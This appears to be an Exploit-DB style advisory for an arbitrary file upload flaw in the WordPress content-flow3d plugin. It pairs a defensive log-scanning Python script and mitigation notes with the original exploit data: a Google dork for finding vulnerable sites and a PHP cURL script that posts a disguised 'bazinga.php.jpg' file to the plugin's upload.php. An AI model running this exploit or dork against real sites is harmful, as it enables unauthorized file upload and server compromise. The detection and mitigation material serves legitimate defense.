Vendor: content-flow3d
By: g11tch
CVSS: 5.5 (MEDIUM)
Arbitrary File Upload
CWE: 434
Product Name: content-flow3d
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE:
CPE: a:wordpress:content-flow3d:1.0.0
Metasploit:
Other Scripts:
Platforms Tested: CentOS, Ubuntu Server 11.04
2012

WordPress content-flow3d Arbitrary File Upload

This exploit allows an attacker to upload arbitrary files through a vulnerable WordPress plugin called content-flow3d. The attacker provides the target URL as a command-line argument. The exploit uses cURL to send a POST request to the plugin's upload.php file with a file named bazinga.php.jpg. It was tested on CentOS and Ubuntu Server 11.04.

Mitigation:

The vulnerability can be mitigated by applying the latest patches or removing the vulnerable plugin.
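
Added example (not part of the original advisory or the exploit author's code): a log check for the two request patterns described above, a POST to the plugin's upload.php and a request for a name such as bazinga.php.jpg that hides a script extension before the final one. It assumes the Apache/nginx combined access-log format; the log lines, IP addresses and the uploads path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: "combined" access-log format (ip, ident, user, [time], "request", status, ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The upload handler named on this page.
UPLOAD_PATH_RE = re.compile(r'/plugins/content-flow3d/upload\.php$', re.I)
# A script extension followed by one more extension, e.g. name.php.jpg
HIDDEN_SCRIPT_RE = re.compile(r'\.(?:php\d?|phtml|phar)\.[a-z0-9]{1,5}$', re.I)

def findings(line):
    """Return a list of (ip, rule, detail) tuples for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m['target'])
    path = unquote(url.path)
    hits = []
    if m['method'] == 'POST' and UPLOAD_PATH_RE.search(path):
        hits.append((m['ip'], 'post-to-upload-handler', f"{path} -> {m['status']}"))
    # Check the requested file name and any qqfile value passed in the query string.
    for name in [path] + parse_qs(url.query).get('qqfile', []):
        if HIDDEN_SCRIPT_RE.search(name):
            hits.append((m['ip'], 'script-ext-before-final-ext', name))
    return hits

def scan(text):
    """Run findings() over every line of a log excerpt."""
    return [hit for line in text.splitlines() for hit in findings(line)]

# Constructed sample; the page does not say where uploaded files are stored.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2012:13:55:36 +0000] "POST /wp-content/plugins/content-flow3d/upload.php HTTP/1.1" 200 48 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.7 - - [10/Jun/2012:13:55:41 +0000] "GET /wp-content/uploads/bazinga.php.jpg HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
203.0.113.20 - - [10/Jun/2012:14:02:10 +0000] "GET /wp-content/uploads/2012/06/holiday.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jun/2012:14:02:12 +0000] "GET /wp-content/plugins/content-flow3d/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, rule, detail in scan(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{detail}")
```

A hit on either rule is a reason to inspect the plugin directory and upload locations for unexpected files; with no patch listed for 1.0.0, removing the plugin remains the fix.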

Exploit-DB raw data:

# Exploit Title: Wordpress content-flow3d Arbitrary File Upload 
# Google Dork: inurl:plugins/content-flow3d/
# Date: 10June2012
# Exploit Author: g11tch
# Vendor Homepage: http://wordpress.org/extend/plugins/content-flow3d/
# Software Link: downloads.wordpress.org/plugin/content-flow3d.zip
# Version: 1.0.0
# Tested on: CentOS, Ubuntu Server 11.04

Greets in no particular order
pfizer.inc   for the constant motivation
pr1me, The_Eccentric, Spridel, Hackett, DrB0n3z, 
thanks to Sammy Forgit for the correct expression
###############################################

#!/usr/bin/php -f
<?php
#
# upload.php curl exploit
#
//
// HTTP FILES,
//

$target = $argv[1];

$postData = array();
$postData[ 'qqfile' ] = "bazinga.php.jpg";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>